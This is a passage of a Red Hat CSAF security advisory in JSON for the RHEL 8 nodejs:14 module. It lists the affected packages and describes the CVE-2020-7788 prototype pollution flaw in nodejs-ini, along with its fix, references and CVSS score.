"AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch" }, "product_reference": "nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src" }, "product_reference": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64 as a component of nodejs:14:8050020211213115342:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" }, "product_reference": "npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", 